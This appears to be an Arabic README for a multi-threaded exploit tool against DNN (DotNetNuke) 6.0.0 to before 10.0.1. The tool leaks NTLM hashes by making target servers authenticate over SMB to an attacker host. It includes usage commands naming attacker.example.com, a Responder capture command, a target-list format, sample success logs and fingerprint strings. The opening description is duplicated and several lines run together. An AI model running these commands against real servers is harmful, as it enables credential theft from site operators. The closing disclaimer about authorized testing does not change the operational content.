
يستهدف هذا الاستغلال ثغرة أمنية في إصدارات DNN (المعروفة سابقًا باسم DotNetNuke) من 6.0.0 حتى ما قبل 10.0.1، والتي تتيح للمهاجمين كشف تجزئات NTLM عبر هجمات تطبيع المسار بنظام Unicode.
يستهدف هذا الاستغلال ثغرة في إصدارات DNN (المعروفة سابقًا باسم DotNetNuke) من 6.0.0 إلى ما قبل 10.0.1، والتي تسمح للمهاجمين بكشف تجزئات NTLM عبر هجمات تطبيع مسار Unicode.
يستغل هذا الاستغلال الخصائص الشاذة في Windows/.NET وتطبيع Unicode لإجبار خادم DNN الهدف على إرسال طلبات SMB إلى خادم يتحكم فيه المهاجم، مما قد يؤدي إلى كشف تجزئات NTLM أثناء عملية المصادقة.
pip install -r requirements.txt)python main.py targets.txt attacker.example.com
python main.py targets.txt 192.168.1.100 -t 20 --timeout 15
targets: ملف يحتوي على قائمة مضيفات DNN (مضيف واحد لكل سطر)smb_server: اسم مضيف/عنوان IP لخادم SMB لالتقاط تجزئات NTLM-t, --threads: عدد الخيوط المتزامنة (الافتراضي: 10)--timeout: مهلة الطلب بالثواني (الافتراضي: 10)أنشئ ملفًا نصيًا يحتوي على عناوين URL للأهداف، سطر واحد لكل هدف:
http://target1.example.com
https://target2.example.com:8080
target3.example.com
يمكنك استخدام أدوات مثل Responder لالتقاط تجزئات NTLM:
responder -I eth0 -wrf
أو استخدم Burp Collaborator للكشف خارج النطاق.
[2025-01-XX-XX:XX:XX] [INFO] Starting DNN NTLM hash disclosure exploit against 5 targets
[2025-01-XX-XX:XX:XX] [INFO] SMB Server: attacker.example.com
[2025-01-XX-XX:XX:XX] [SUCCESS] [target1.com] DNN indicator found: dnn_IsMobile
[2025-01-XX-XX:XX:XX] [SUCCESS] [target1.com] File upload endpoint accessible
[2025-01-XX-XX:XX:XX] [SUCCESS] [target1.com] Exploit payload sent successfully
[2025-01-XX-XX:XX:XX] [INFO] [target1.com] Check your SMB server for incoming NTLM authentication attempts
يبحث الاستغلال عن المؤشرات التالية المتعلقة بـ DNN:
dnn_IsMobiledotnetnuke في الاستجابةdnnconnect في الاستجابةDNN Platform في الاستجابةهذه الأداة مخصصة للأغراض التعليمية واختبارات الأمان المصرح بها فقط. استخدمها بمسؤولية وفقط على الأنظمة التي تمتلكها أو لديك إذن صريح لاختبارها.